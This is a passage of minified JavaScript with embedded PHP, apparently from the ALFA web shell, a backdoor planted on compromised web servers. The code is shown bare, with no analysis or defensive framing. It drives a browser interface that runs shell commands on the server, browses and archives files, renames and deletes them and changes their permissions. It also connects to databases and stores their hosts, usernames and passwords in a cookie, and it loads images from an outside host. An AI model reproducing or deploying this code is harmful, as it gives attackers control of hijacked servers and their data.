onclick="closeOption(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div>'),$(o).classList.toggle("option_is_active"),d.querySelectorAll("#"+o+" form, #"+o+" a").forEach(function(t){var a=t.classList.value;if("getconfig"==a||"rejectme"==a)return!1;if("FORM"==t.tagName){var l=t.getAttribute("onsubmit");t.setAttribute("onsubmit",'alfaBeforeDoAction("'+e+i+'");'+l),t.setAttribute("opt_id",e+i)}else{l=t.getAttribute("onclick");t.setAttribute("onclick",'alfaBeforeDoAction("'+e+i+'");'+l)}});try{$(o).querySelector(".getconfig").setAttribute("base_id",e+i)}catch(e){}return e+i}a.innerHTML=t;var n=$("tab_option_"+e);null!=n&&((-1==n.classList.value.indexOf("tab_is_active")||options_window_is_minimized)&&(n.classList.add("tab-is-done"),alfaShowNotification("proccess is done...",n.innerText)),options_window_is_minimized&&alfaUpdateOptionsBadge("options_window")),d.querySelectorAll("#option_"+e+" form, #option_"+e+" a").forEach(function(t){var a=t.classList.value;if("getconfig"==a||"rejectme"==a)return!1;if("FORM"==t.tagName){var i=t.getAttribute("onsubmit");t.setAttribute("onsubmit",'alfaBeforeDoAction("'+e+'");'+i),t.setAttribute("opt_id",e)}else{i=t.getAttribute("onclick");t.setAttribute("onclick",'alfaBeforeDoAction("'+e+'");'+i)}});try{a.querySelector(".getconfig").setAttribute("base_id",e)}catch(e){}options_window_is_minimized||(d.body.style.overflow="hidden")}function alfaBeforeDoAction(e){alfa_before_do_action_id=e}function alfaLoaderOnTop(e){$("a_loader").style.display=e,d.body.style.overflow="block"==e?"hidden":"visible"}function alfaAjaxController(e){var t=e.getAttribute("parent");$("loader_"+t).remove(),"filesman_holder"==t.substr(0,15)&&($(t).style.minHeight="0"),_ALFA_AJAX_.hasOwnProperty(t)&&_ALFA_AJAX_[t].abort()}function closeDatabase(e,t){t.stopPropagation();var a=e.getAttribute("opt_id");if($(a).remove(),-1!=$("tab_"+a).classList.value.indexOf("sql-active-tab"))if((e=d.querySelectorAll(".sql-tabs .sql-tabname")).length>1){e[0].classList.add("sql-active-tab");var i=e[0].getAttribute("opt_id");null!=$(i)&&$(i).classList.toggle("sql-active-content")}else editorClose("database_window");d.querySelector("div[opt_id="+a+"]").remove()}function closeFmTab(e,t){t.stopPropagation();var a=e.getAttribute("fm_id"),i=$("filesman_tab_"+a);if(-1!=i.classList.value.indexOf("filesman-tab-active")&&(e=d.querySelectorAll("#filesman_tabs .filesman_tab")).length>1){e[0].classList.add("filesman-tab-active");var l=e[0].getAttribute("fm_id"),r="filesman_holder_"+l;if(null!=$(r)){$(r).classList.toggle("filesman-active-content");var o=$("filesman_tab_"+l).getAttribute("path");initDir(o),d.mf.c.value=o,alfa_current_fm_id=l}}i.remove(),$("filesman_holder_"+a).remove(),alfaFilesmanTabHideTitle()}function closeOption(e,t){t.stopPropagation();var a=e.getAttribute("opt_id");if($(a).remove(),-1!=$("tab_"+a).classList.value.indexOf("tab_is_active"))if((e=d.querySelectorAll(".options_tab .tab_name")).length>1){e[0].classList.add("tab_is_active");var i=e[0].getAttribute("opt_id");null!=$(i)&&$(i).classList.toggle("option_is_active")}else editorClose("options_window");d.querySelector("div[opt_id="+a+"]").remove()}function historyPanelController(e){"hidden"==e.getAttribute("mode")?(d.querySelector(".editor-explorer").style.display="block",d.querySelector(".editor-modal").style.marginLeft="20%",e.setAttribute("mode","visible"),e.style.left="19%",e.innerHTML="<<"):(d.querySelector(".editor-explorer").style.display="none",d.querySelector(".editor-modal").style.marginLeft="1%",e.setAttribute("mode","hidden"),e.style.left="0%",e.innerHTML=">>")}function closeTerminalContent(e,t){t.stopPropagation();var a=e.getAttribute("term_id");if(($(a).remove(),-1!=$("tab_"+a).classList.value.indexOf("active-terminal-tab"))&&(e=d.querySelectorAll(".terminal-tabs .terminal-tab")).length>1){e[0].classList.add("active-terminal-tab");var i=e[0].getAttribute("term_id");null!=$(i)&&$(i).classList.toggle("active-terminal-content")}d.querySelector("div[term_id="+a+"]").remove()}function closeEditorContent(e,t){t.stopPropagation();var a=e.getAttribute("opt_id");if(($(a).remove(),-1!=$("tab_"+a).classList.value.indexOf("editor-tab-active"))&&(e=d.querySelectorAll(".editor-tabs .editor-tab-name")).length>1){e[0].classList.add("editor-tab-active");var i=e[0].getAttribute("opt_id");null!=$(i)&&$(i).classList.toggle("editor-content-active")}d.querySelector("div[opt_id="+a+"]").remove()}function optionsTabController(e){try{d.querySelector(".options_holder.option_is_active").classList.remove("option_is_active")}catch(e){}var t=e.getAttribute("opt_id");if(null==t)return!1;$(t).classList.toggle("option_is_active");try{d.querySelector("#options_window .content_options_holder .options_tab \t.tab_name.tab_is_active").classList.remove("tab_is_active")}catch(e){}e.classList.remove("tab-is-done"),e.classList.add("tab_is_active"),d.querySelector(".opt-title").innerHTML=e.getAttribute("title"),alfaUpdateOptionsBadge("options_window")}function terminalTabController(e){try{d.querySelector(".terminal-tab.active-terminal-tab").classList.remove("active-terminal-tab")}catch(e){}try{d.querySelector(".terminal-content.active-terminal-content").classList.remove("active-terminal-content")}catch(e){}var t=e.getAttribute("term_id");if(null==t)return!1;$(t).classList.toggle("active-terminal-content"),e.classList.remove("tab-is-done"),e.classList.add("active-terminal-tab"),$(t).querySelector(".php-terminal-input").focus(),alfaUpdateOptionsBadge("cgiloader")}function filesmanTabController(e){try{d.querySelector(".ajaxarea.filesman-active-content").classList.remove("filesman-active-content")}catch(e){}try{d.querySelector(".filesman_tab.filesman-tab-active").classList.remove("filesman-tab-active")}catch(e){}var t=e.getAttribute("fm_id");if(null==t)return!1;alfa_current_fm_id=t,e.classList.add("filesman-tab-active"),e.classList.remove("tab-is-done"),$("filesman_holder_"+t).classList.toggle("filesman-active-content");var a=e.getAttribute("path");initDir(a),d.mf.c.value=a}function dbTabController(e){try{d.querySelector(".sql-content.sql-active-content").classList.remove("sql-active-content")}catch(e){}try{d.querySelector(".sql-tabname.sql-active-tab").classList.remove("sql-active-tab")}catch(e){}var t=e.getAttribute("opt_id");if(null==t)return!1;$(t).classList.toggle("sql-active-content"),e.classList.remove("tab-is-done"),e.classList.add("sql-active-tab"),alfaUpdateOptionsBadge("database_window")}function editorTabController(e,t){try{d.querySelector(".editor-contents.editor-content-active").classList.remove("editor-content-active")}catch(e){}var a=null;void 0===t?a=e.getAttribute("opt_id"):(a=e,e=$("tab_"+a));var i=editor_files["file_"+a.replace("editor_source_","")];if(void 0!==i&&(d.querySelector(".editor-path").innerHTML=(i.pwd+"/"+i.file).replace(/\/\//g,"/")),null==a)return!1;$(a).classList.toggle("editor-content-active");try{d.querySelector(".editor-tabs .editor-tab-name.editor-tab-active").classList.remove("editor-tab-active")}catch(e){}e.classList.remove("tab-is-done"),e.classList.add("editor-tab-active"),alfaUpdateOptionsBadge("editor")}function alfaUpdateOptionsBadge(e){var t=d.querySelector("#"+e+"-minimized .options_min_badge");if(null!=t){var a=d.querySelectorAll("#"+e+" .tab-is-done").length;t.innerHTML=a,t.style.visibility=a>0?"visible":"hidden"}}function alfaOpenPhpTerminal(e){if(php_temrinal_using_cgi&&void 0===e)showEditor("cgiloader");else{$("cgiloader").style.display="block",$("cgiloader").style.background="rgba(0, 0, 0, 0.57)",$("cgiframe").style.background="rgba(0, 0, 0, 0.81)",$("cgiframe").style.border="1px solid rgb(30, 86, 115)",$("cgiframe").style.height="90%",$("cgiframe").style.padding="3px",d.querySelector("#cgiloader .opt-title").innerHTML="Terminal";var t="",a="",i="terminal_id_"+getRandom(10);void 0===e&&(t=" active-terminal-content",a=" active-terminal-tab"),d.querySelector("#cgiframe .terminal-contents").insertAdjacentHTML("afterbegin",'<div id="'+i+'" class="terminal-content'+t+'"><div class="php-terminal-output"><div><button class="terminal-btn-fontctl" onClick="changeTerminalFontSize(\''+i+'\',1);">+</button><button class="terminal-btn-fontctl" onClick="changeTerminalFontSize(\''+i+"',0);\">-</button><input onchange=\"alfaTerminalChangecolor(this,'"+i+'\');" style="height: 18px;background: #dde2e2;" type="color"></div><pre class="ml1" style="border:unset;height: 90%;"></pre></div><div><form term_id="'+i+'" onSubmit="alfaExecTerminal(this);this.c.value=\'\';return false;" autocomplete="off" style="margin-top: 10px;"><div style="overflow: auto;white-space: nowrap;"><div style="display: inline-block;color:#4fbec3;margin-bottom:5px;margin-right:5px;">CWD:~# </div><div style="display: inline-block;color:#42ec42;" class="php-terminal-current-dir"></div></div><div style="position:relative;"><span style="color: #00ff08;font-size: 25px;">$ </span><input style="padding: 8px;font-size: 20px;width: 67%;border: 1px solid #27979B;padding-right:35px;" onkeyup="alfaWalkInTerminalHistory(this,event,\''+i+'\');" term_id="'+i+'" class="php-terminal-input" type="text" name="c" onfocus="closeHistoryCmd(\'free\',this);" placeholder="ls -la"><button class="button" style="color: #27979B;padding: 12px;margin-left: 10px;border-radius: 2px;font-weight: bolder;">ExeCute<button term_id="'+i+'" class="button" style="color: #27979B;padding: 12px;margin-left: 10px;border-radius: 2px;font-weight: bolder;" onClick="alfaExecTerminal(this, 1);return false;">Current Dir</button><div class="cmd-history-holder"><div class="commands-history-header">History</div><span onClick="clearTerminalHistory();" style="border-bottom: 1px solid;margin-bottom: 5px;display: inline-block;padding: 5px;color: #59de69;cursor: pointer;">Clear history</span><div style="overflow: auto;height: 82%;" class="commands-history"></div></div><div term_id="'+i+'" class="cmd-history-icon" mode="" onclick="closeHistoryCmd(this);"><img style="width:27px;" src="http://solevisible.com/icons/menu/time2.svg"></div></form></div></div></div>');try{$("terminal_new_tab").remove()}catch(e){}d.querySelector("#cgiframe .terminal-tabs").insertAdjacentHTML("beforeend",'<div onclick="terminalTabController(this);" term_id="'+i+'" id="tab_'+i+'" class="terminal-tab'+a+'">Terminal <img term_id="'+i+'" onclick="closeTerminalContent(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div>'),d.querySelector("#cgiframe .terminal-tabs").insertAdjacentHTML("beforeend",'<div onclick="alfaOpenPhpTerminal(true);" id="terminal_new_tab" style="background-color:#800000;" class="terminal-tab">New Tab +</div>'),terminal_walk_index[i]={index:0,key:-1},d.querySelector("#"+i+" .php-terminal-input").focus(),d.querySelector("#"+i+" .php-terminal-current-dir").innerHTML=c_,d.querySelector("#cgiloader-minimized .minimized-text").innerHTML="Terminal",alfaTerminalSetColorAndSize(i),php_temrinal_using_cgi=!0;var l=alfaGetTerminalHistory();for(var r in l)d.querySelector("#"+i+" .cmd-history-holder .commands-history").insertAdjacentHTML("afterbegin","<div onclick=\"d.querySelector('#"+i+' .php-terminal-input\').value = this.innerHTML;" class="history-cmd-line">'+l[r]+"</div>")}d.body.style.overflow="hidden"}function alfaTerminalSetColorAndSize(e){var t=getCookie("alfa-terminal-color"),a=getCookie("alfa-terminal-fontsize");void 0!==t&&(d.querySelector("#"+e+" pre.ml1").style.color=t),void 0!==a&&(d.querySelector("#"+e+" pre.ml1").style.fontSize=a)}function alfaTerminalChangecolor(e,t){d.querySelector("#"+t+" pre.ml1").style.color=e.value,setCookie("alfa-terminal-color",e.value,2012)}function alfaGetTerminalHistory(e){var t=getCookie("alfa-terminal-history");try{t=atob(t),t=JSON.parse(t)}catch(e){t=[]}return void 0!==e&&t.reverse(),t}function changeTerminalFontSize(e,t){var a=d.querySelector("#"+e+" pre.ml1"),i=parseInt(window.getComputedStyle(a,null).getPropertyValue("font-size")),l="";1==t?(l=i+1+"px",a.style.fontSize=l):(l=i-1+"px",a.style.fontSize=l),setCookie("alfa-terminal-fontsize",l,2012)}function alfaWalkInTerminalHistory(e,t,a){var i=t||window.event;if("38"==i.keyCode||"40"==i.keyCode||"37"==i.keyCode||"39"==i.keyCode)switch(i.keyCode){case 38:var l=alfaGetTerminalHistory(!0),r="";0==terminal_walk_index[a].index?(0==terminal_walk_index[a].key&&++terminal_walk_index[a].index,void 0!==(r=l[terminal_walk_index[a].index])?(e.value=r,++terminal_walk_index[a].index):(e.value="",terminal_walk_index[a].index=0)):terminal_walk_index[a].index<l.length&&(0==terminal_walk_index[a].key&&++terminal_walk_index[a].index,e.value=l[terminal_walk_index[a].index],++terminal_walk_index[a].index),terminal_walk_index[a].key=1;break;case 40:l=alfaGetTerminalHistory(!0);if(terminal_walk_index[a].index>=0)0!=terminal_walk_index[a].index&&(--terminal_walk_index[a].index,1==terminal_walk_index[a].key&&--terminal_walk_index[a].index),void 0!==(r=l[terminal_walk_index[a].index])?e.value=r:(e.value="",terminal_walk_index[a].index=0);terminal_walk_index[a].key=0;break;default:console.log(i.keyCode)}else terminal_walk_index[a].index=0}function clearTerminalHistory(){d.querySelectorAll(".commands-history").forEach(function(e){e.innerHTML=""}),setCookie("alfa-terminal-history","",2012)}function alfaAceToFullscreen(e){var t=e.getAttribute("ace_id");alfa_ace_editors.editor[t].container.requestFullscreen()}function closeHistoryCmd(e,t){if("free"==e){var a=t.getAttribute("term_id");return e=d.querySelector("#"+a+" .cmd-history-icon"),d.querySelector("#"+a+" .cmd-history-holder").style.visibility="hidden",d.querySelector("#"+a+" .cmd-history-holder").style.opacity="0",e.setAttribute("mode","off"),!1}var i=e.getAttribute("mode"),l=(a=e.getAttribute("term_id"),d.querySelector("#"+a+" .cmd-history-holder"));0==i.length||"off"==i?(l.style.visibility="visible",l.style.opacity="1",e.setAttribute("mode","on")):(l.style.visibility="hidden",l.style.opacity="0",e.setAttribute("mode","off"))}function geEvalAceValue(e){var t=e.querySelector(".php-evals-ace").getAttribute("id");return alfa_ace_editors.eval[t].getValue()}function alfaOpenArchive(e){var t=e.getAttribute("path"),a=e.getAttribute("fname"),i=e.getAttribute("base_id");if(".."==a&&"phar://"!=t.substr(0,7))return!1;var l="a="+alfab64("open_archive_dir")+"&c="+alfab64(c_)+"&alfa1="+alfab64(t)+"&alfa2="+alfab64(i)+"&ajax="+alfab64("true");_Ajax(d.URL,l,function(e){if("0"!=e){$("archive_base_"+i).innerHTML=e;var a=$("archive_dir_"+i).getAttribute("archive_name"),l=$("archive_dir_"+i).getAttribute("archive_full"),r="",o="";if(0!=(t=t.split(a)[1]).length){var n=(t=t.split("/")).length-1;for(var s in 0==t[n].length&&t.splice(n,1),t)0!=t.length&&(o+=t[s]+"/",r+='<a base_id="'+i+'" fname="'+t[s]+'" path="'+l+o+'" onclick="alfaOpenArchive(this);">'+t[s]+"/</a>")}d.querySelector("#archive_dir_"+i+" .archive_pwd_holder").innerHTML=r}},!1,"open_archive_dir")}function alfaDeleteConnectToDb(e){d.querySelectorAll(".dbh_"+e).forEach(function(e){e.remove()}),alfaConnectionHistoryUpdate(e)}function alfaConnectToDb(e,t){var a={};try{a=JSON.parse(atob(getCookie("alfa_connection_hist")))}catch(e){}var i=d.querySelector("#"+t+" div.sf");i.querySelector("input[name=sql_host]").value=a[e].host,i.querySelector("input[name=sql_login]").value=a[e].user,i.querySelector("input[name=sql_pass]").value=a[e].pass,(i.querySelector("input[name=sql_base]")?i.querySelector("input[name=sql_base]"):i.querySelector("select[name=sql_base]")).value=a[e].db,i.querySelector("input[name=sql_count]").checked=!0,d.querySelector("#"+t+" div.sf .db-connect-btn").click()}function alfaShowConnectionHistory(e){var t={},a=e.getAttribute("db_id"),i=e.getAttribute("mode");if(rows='<table class="connection-hist-table"><tr><th>*</th><th>Host</th><th>User</th><th>Pass</th><th>Database</th><th>Connect</th><th>Delete</th></tr>',"on"==i){e.setAttribute("mode","off");try{t=JSON.parse(atob(getCookie("alfa_connection_hist")))}catch(e){}var l,r=1;for(l in t){var o=t[l].user+"_"+t[l].db;rows+='<tr class="dbh_'+o+'"><th>'+r+"</th><th>"+t[l].host+"</th><th>"+t[l].user+"</th><th>"+t[l].pass+"</th><th>"+t[l].db+'</th><th><button style="margin: unset;" class="connection-his-btn" onclick=\'alfaConnectToDb("'+o+'","'+a+'");\'>Connect</button></th><th style="text-align: center;"><button style="margin: unset;" class="connection-his-btn connection-delete" onclick=\'alfaDeleteConnectToDb("'+o+"\");'>X</button></th></tr>",r++}rows+="</table"}else e.setAttribute("mode","on"),rows="";d.querySelector("#"+a+" .connection_history_holder").innerHTML=rows}function alfaConnectionHistoryUpdate(e){var t,a={};try{a=JSON.parse(atob(getCookie("alfa_connection_hist")))}catch(e){}for(t in mysql_cache)0!=mysql_cache[t].db.length&&(a[mysql_cache[t].user+"_"+mysql_cache[t].db]=mysql_cache[t]);void 0!==e&&delete a[e],setCookie("alfa_connection_hist",btoa(JSON.stringify(a)),2012)}function alfaExecTerminal(e,t){var a="";if(0==(a=void 0!==t?"cd "+c_:e.c.value).length)return!1;"l"==a?a="ls -trh --color":"ll"==a&&(a="ls -ltrh --color");var i=e.getAttribute("term_id");alfaloader(i,"block"),closeHistoryCmd("free",e);var l="";"FORM"==e.tagName&&(l=e.querySelector(".php-terminal-current-dir").innerHTML),0==(l=l.trim()).length&&(l=c_);var r="a="+alfab64("terminalExec")+"&c="+alfab64(l)+"&alfa1="+alfab64(a)+"&ajax="+alfab64("true");if(_Ajax(d.URL,r,function(e,t){alfaloader(t,"none");try{var a=$("tab_"+i);null!=a&&((-1==a.classList.value.indexOf("active-terminal-tab")||cgi_is_minimized)&&(a.classList.add("tab-is-done"),alfaShowNotification("proccess is done...",a.innerText)),cgi_is_minimized&&alfaUpdateOptionsBadge("cgiloader"))}catch(e){}e=JSON.parse(e),d.querySelector("#"+t+" .php-terminal-output > pre").innerHTML=e.output,0!=e.path.length&&(d.querySelector("#"+t+" .php-terminal-current-dir").innerHTML=e.path)},!1,i),void 0===t){d.querySelector("#"+i+" .cmd-history-holder .commands-history").insertAdjacentHTML("afterbegin","<div onclick=\"d.querySelector('#"+i+' .php-terminal-input\').value = this.innerHTML;" class="history-cmd-line">'+a+"</div>");var o=alfaGetTerminalHistory(),n=o.indexOf(a);-1!=n&&o.splice(n,1),o.push(a),setCookie("alfa-terminal-history",btoa(JSON.stringify(o)),2012)}d.querySelector("#"+i+" input.php-terminal-input").focus()}function pageChangedFilesMan(e){var t="filesman_holder_"+alfa_current_fm_id,a=getCookie(t+"_page_number"),i=e.innerText;if("<<"==i){a=d.querySelector("#"+t+" .active-page-number").innerText;if(!((a=parseInt(a))>1))return!1;i=a-1}if(">>"==i){a=d.querySelector("#"+t+" .active-page-number").innerText;a=parseInt(a);var l=d.querySelector("#"+t+" .last-page-number").innerHTML;if(!(a+1<=(l=parseInt(l))))return!1;i=a+1}setCookie(t+"_page_number",i,2012),g("FilesMan",c_)}function alfaColDumperInit(){var e=d.querySelector(".tab_name.tab_is_active").getAttribute("opt_id"),t=d.querySelector("#"+e),a=t.getElementsByClassName("box");for(i=0;i<a.length;i++)a[i].addEventListener("click",function(){null!=this.parentElement.querySelector(".nested")&&(this.parentElement.querySelector(".nested").classList.toggle("active"),this.classList.toggle("check-box"))});var i;a=t.getElementsByClassName("sub-box");for(i=0;i<a.length;i++)a[i].setAttribute("opt_id",e),a[i].addEventListener("click",function(){this.classList.toggle("check-box");var e=this.getAttribute("tbl"),t=this.getAttribute("opt_id");t=t.replace("option_",""),col_dumper_selected_data.hasOwnProperty(t)||(col_dumper_selected_data[t]={}),void 0===col_dumper_selected_data[t][e]&&(col_dumper_selected_data[t][e]=[]);var a=this.innerHTML,i=col_dumper_selected_data[t][e].indexOf(a);-1==i?col_dumper_selected_data[t][e].push(a):col_dumper_selected_data[t][e].splice(i,1)})}function showSymlinkPath(e,t){t.stopPropagation();var a=e.getAttribute("row"),i=$("td_row_"+a),l=e.getAttribute("opt_title"),r=e.getAttribute("fname");if(l=decodeURIComponent(r)+" -> "+l,null!=i){i.insertAdjacentHTML("afterbegin",'<div class="symlink_path" id="link_id_'+a+'">'+l+"</div>");var o=t.clientX,n=t.clientY-30;$("link_id_"+a).style.left=o+"px",$("link_id_"+a).style.top=n+"px"}}function hideSymlinkPath(e,t){t.stopPropagation(),$("link_id_"+e.getAttribute("row")).remove()}function alfagetFlags(){data="a="+alfab64("get_flags")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),_Ajax(d.URL,data,function(e){var t=JSON.parse(e);t.hasOwnProperty("server")&&(d.querySelectorAll(".flag-holder")[0].innerHTML='<img draggable="false" title="'+t.server.name+'" src="http://solevisible.com/images/flags/48/'+t.server.code.toLowerCase()+'.png">',d.querySelectorAll(".flag-holder")[0].style.display="inline"),t.hasOwnProperty("client")&&(d.querySelectorAll(".flag-holder")[1].innerHTML='<img draggable="false" title="'+t.client.name+'" src="http://solevisible.com/images/flags/48/'+t.client.code.toLowerCase()+'.png">',d.querySelectorAll(".flag-holder")[1].style.display="inline")})}function colDumplerSelectType(e){var t=e.options[e.selectedIndex].value;$("coldumper-delimiter-input").style.display="delimiter"==t?"inline-block":"none"}function alfaCheckUrlHash(){var e=window.location.hash.substr(1),t=e.split("&").reduce(function(e,t){var a=t.split("=");return e[a[0]]=a[1],e},{});if(""!=e)switch(t.action){case"fileman":case"options":t.path=decodeURIComponent(t.path),g("FilesMan",t.path,function(e){if(t.hasOwnProperty("file")){var a="auto";isArchive(t.file)&&(a="view"),editor(t.path+"/"+t.file,a,"","","","file")}}),"options"==t.action&&t.hasOwnProperty("opt")&&(alfa_can_add_opt=!0,g(t.opt,null,"","",""),d.querySelector(".opt-title").innerHTML=$("menu_opt_"+t.opt).innerHTML),t.hasOwnProperty("file")||editorClose("editor"),t.hasOwnProperty("opt")||editorClose("options_window"),editorClose("cgiloader");break;default:g("FilesMan","<?php 
            echo $GLOBALS["cwd"];
            ?>"),editorClose("editor"),editorClose("options_window"),editorClose("cgiloader")}else g("FilesMan","<?php 
            echo $GLOBALS["cwd"];
            ?>"),editorClose("editor"),editorClose("options_window"),editorClose("cgiloader")}function alfaFmngrContextRow(){d.querySelectorAll(".fmanager-row a.main_name").forEach(function(e){e.addEventListener("contextmenu",function(e){var t=e.target,a="";if(".."==(a="A"==e.target.parentElement.tagName?(t=e.target.parentElement).getAttribute("fname"):t.getAttribute("fname")))return!1;var i=t.getAttribute("id"),l=t.getAttribute("path"),r=t.getAttribute("ftype"),o=["newtab","link","download","view","edit","move","copy","rename","modify","permission","compress","extract","delete"];for(var n in"file"!=r||isArchive(a)?o[3]="view_archive":o.splice(11,1),"folder"==r&&(o=["newtab","link","move","copy","rename","modify","permission","compress","delete"]),alfaSortMenuItems(o),o){var s=d.querySelector("#rightclick_menu > a[name="+o[n]+"]");switch(s.setAttribute("fid",i),s.setAttribute("fname",decodeURIComponent(a)),s.setAttribute("path",l),s.setAttribute("ftype",r),o[n]){case"view":case"edit":var c="auto";"edit"==o[n]&&(c="edit"),s.setAttribute("href","#action=fileman&path="+c_+"/&file="+a),s.setAttribute("onclick","editor('"+a+"','"+c+"','','','','file')");break;case"newtab":var u=a;"file"==r?(u="&file="+a,s.setAttribute("href","#action=fileman&path="+c_+"/"+u),s.setAttribute("target","_blank"),s.onclick=function(){}):(s.setAttribute("href","javascript:void(0)"),s.removeAttribute("target"),s.onclick=function(){alfaFilesManNewTab(c_,u)});break;case"delete":s.setAttribute("onclick","var chk = confirm('Are You Sure For Delete # "+a+" # ?'); chk ? g('FilesMan',null,'delete', '"+a+"') : '';");break;case"download":s.setAttribute("onclick","g('FilesTools',null,'"+a+"', 'download')");break;case"permission":try{var p=d.querySelector("#id_chmode_"+i.replace("id_","")+" span").innerHTML;s.setAttribute("perm",p.trim())}catch(e){}break;case"link":s.style.display="block";var f="<?php 
            echo $_SERVER["DOCUMENT_ROOT"];
            ?>/",m=(c_+"/"+a).replace(/\/\//g,"/");if(-1!=m.indexOf(f)){f=m.replace(f,"");var b=location.origin+"/"+f;s.setAttribute("href",""+b)}else s.style.display="none"}}var y=e.clientX,_=e.clientY;alfaRightClickMenu(y,_),e.preventDefault()})})}function alfaFilesManNewTab(e,t,a){var i=t;void 0!==a&&(i=alfaGetLastFolderName(e));var l=decodeURIComponent(e+"/"+t);l=l.replace(/\/\//g,"/");var r=$("filesman_tab_1"),o=r.getAttribute("fm_counter");o=parseInt(o)+1,r.setAttribute("fm_counter",o),d.querySelector("#filesman_tabs_child").insertAdjacentHTML("beforeend",'<div onmouseover="alfaFilesmanTabShowTitle(this,event);" onmouseout="alfaFilesmanTabHideTitle(this,event);" path="'+l+'" id="filesman_tab_'+o+'" fm_id="'+o+'" onclick="filesmanTabController(this);" fname="'+t+'" class="filesman_tab"><img class="folder-tab-icon" src="http://solevisible.com/icons/menu/folder2.svg"> <span class="filesman-tab-folder-name">'+i+'</span> <img fm_id="'+o+'" onclick="closeFmTab(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div>'),d.querySelector(".ajaxarea").insertAdjacentHTML("beforebegin",'<div style="position:relative;" fm_id="'+o+'" id="filesman_holder_'+o+'" class="ajaxarea"><div class="header"></div></div>'),alfa_fm_id=o,g("FilesMan",l),alfa_fm_id=0}function alfaFilesmanTabShowTitle(e,t){t.stopPropagation();var a=$("filesman-tab-full-path");a.style.display="block",a.style.top=e.offsetTop-37+"px",a.style.left=e.offsetLeft-$("filesman_tabs").scrollLeft+"px",a.innerHTML=e.getAttribute("path")}function alfaFilesmanTabHideTitle(e,t){$("filesman-tab-full-path").style.display="none"}function alfaPopupAction(e,t){var a="",i="";switch(t){case"rename":a="Old file name:",i="New file name:";break;case"copy":a="File path:",i="Enter the file path that you want to copy this file to:";break;case"move":a="Current Path:",i="Enter the file path that you want to move this file to:";break;case"extract":a="Files to extract:",i="Enter the path you wish to extract the files to and click Extract:"}var l=e.getAttribute("fname"),r=e.getAttribute("path"),o=t.charAt(0).toUpperCase()+t.slice(1);if("permission"==t){d.querySelector("#shortcutMenu-holder").style.height="222px",o="Change Permissions",d.querySelector("#shortcutMenu-holder > form > .perm-table-holder").style.display="block",d.querySelector("#shortcutMenu-holder > form > input[name=fname]").style.display="none";var n=e.getAttribute("perm"),s=n.substr(1,1),c=n.substr(2,1),u=n.substr(3,1);d.querySelector("#shortcutMenu-holder > form input[name=u]").value=s,d.querySelector("#shortcutMenu-holder > form input[name=g]").value=c,d.querySelector("#shortcutMenu-holder > form input[name=w]").value=u,autoCheckPerms(s,"u",["u","g","w"]),autoCheckPerms(c,"g"),autoCheckPerms(u,"w")}else d.querySelector("#shortcutMenu-holder").style.height="190px",d.querySelector("#shortcutMenu-holder > form > input[name=fname]").style.display="block",d.querySelector("#shortcutMenu-holder > form > .perm-table-holder").style.display="none";var p="move"==t||"copy"==t?r+l:l;if("modify"==t){var f="tr_row_"+e.getAttribute("fid").replace("id_","");p=d.querySelector("#"+f+" .main_modify").innerText}d.querySelector(".cl-popup-fixed").style.display="block",d.querySelector("#shortcutMenu-holder .popup-head").innerHTML=o,d.querySelector("#shortcutMenu-holder .old-path-lbl").innerHTML=a,d.querySelector("#shortcutMenu-holder .new-filename-lbl").innerHTML=i,d.querySelector("#shortcutMenu-holder .popup-foot > button[name=accept]").innerHTML=o,d.querySelector("#shortcutMenu-holder > form > .old-path-content").innerHTML=r+l,d.querySelector("#shortcutMenu-holder > form > input[name=fname]").value=p,d.querySelector("#shortcutMenu-holder button[name=accept]").setAttribute("fid",e.getAttribute("fid")),d.querySelector("#shortcutMenu-holder button[name=accept]").setAttribute("action",t)}function calcperm(){var e=event.srcElement;autoCheckPerms(e.checked,e.name.substr(0,1))}function autoCheckPerms(e,t,a){if(void 0!==a)for(var i in a){var l=a[i];d.querySelector("#shortcutMenu-holder > form input[name="+l+"r]").checked=!1,d.querySelector("#shortcutMenu-holder > form input[name="+l+"w]").checked=!1,d.querySelector("#shortcutMenu-holder > form input[name="+l+"x]").checked=!1}var r=d.querySelector("#shortcutMenu-holder > form input[name="+t+"r]"),o=d.querySelector("#shortcutMenu-holder > form input[name="+t+"w]"),n=d.querySelector("#shortcutMenu-holder > form input[name="+t+"x]");if("boolean"!=typeof e)"7"==e?(r.checked=!0,o.checked=!0,n.checked=!0):"4"==e?r.checked=!0:"2"==e?o.checked=!0:"1"==e?n.checked=!0:"6"==e?(r.checked=!0,o.checked=!0):"3"==e?(o.checked=!0,n.checked=!0):"5"==e&&(r.checked=!0,n.checked=!0);else{var s=0;r.checked&&(s+=4),o.checked&&(s+=2),n.checked&&(s+=1),"u"==t?d.querySelector("#shortcutMenu-holder > form input[name=u]").value=s:"g"==t?d.querySelector("#shortcutMenu-holder > form input[name=g]").value=s:"w"==t&&(d.querySelector("#shortcutMenu-holder > form input[name=w]").value=s)}}function gg(e,t,a,i,l,r){var o="filesman_holder_"+alfa_current_fm_id;alfaloader(o,"block"),data="a="+alfab64(e)+"&c="+alfab64(t)+"&alfa1="+alfab64(a)+"&alfa2="+alfab64(i)+"&alfa3="+alfab64(l)+"&ajax="+alfab64("true"),_Ajax(d.URL,data,r,!1,o)}function alfaPopUpDoAction(e){var t=e.getAttribute("action");switch(t){case"rename":case"move":case"copy":var a=e.getAttribute("fid").replace("id_",""),i=$("id_"+a).getAttribute("fname"),l=d.querySelector("#shortcutMenu-holder > form > input[name=fname]").value;l=l.trim(),i=i.trim(),gg("doActions",c_,i,l,t,function(e,i){if("rename"==t)if("done"==e){var r=$("id_"+a);updateFileEditor(a,l);var o=r.getAttribute("path")+$("id_"+a).getAttribute("fname");d.querySelector("#shortcutMenu-holder > form > .old-path-content").innerHTML=o,r.addEventListener("animationend",function(){r.classList.remove("textEffect")}),r.classList.add("textEffect"),alfaShowNotification("Renamed...","Rename Action"),d.querySelector(".cl-popup-fixed").style.display="none"}else alfaShowNotification("error...!","Rename Action","error");alfaloader(i,"none")});break;case"permission":var r=d.querySelector("#shortcutMenu-holder > form input[name=u]").value,o=d.querySelector("#shortcutMenu-holder > form input[name=g]").value,n=d.querySelector("#shortcutMenu-holder > form input[name=w]").value;i=(i=d.querySelector("#shortcutMenu-holder > form > .old-path-content").innerHTML).trim();var 